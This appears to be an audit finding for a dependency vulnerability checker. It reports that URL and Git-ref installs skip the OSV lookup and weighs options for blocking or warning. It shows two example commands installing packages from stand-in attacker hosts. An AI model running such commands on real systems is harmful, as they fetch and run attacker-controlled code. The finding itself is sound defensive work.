Bypass Description
Installs from an arbitrary URL or a Git ref pass the check unexamined. OSV indexes advisories by ecosystem, package name and version, so a specifier that carries no registry coordinates has nothing to look up and falls through as "no known vulnerabilities", even though the artifact is fully attacker-controlled and can change between installs:
npm install https://attacker.com/malicious.tgz
pip install git+https://github.com/attacker/malware.git
Design Decision Needed
Options:
- Block URL/git installs by default (safest; needs an explicit opt-out for legitimate cases such as private forks and unreleased fixes)
- Warn and ask user (only works interactively; an unattended CI run has nobody to answer)
- Allow with warning (weakest; a warning in a scrolling install log is easy to miss)
Difficulty: Design
This is a fundamental limitation of vulnerability databases, not a bug in the lookup: a database can only describe artifacts it can name, and an arbitrary tarball or commit has no stable registry identity to match against. The tool can only decide what to do when it knows it cannot check.
Priority: High
Found in security audit 2024-01-06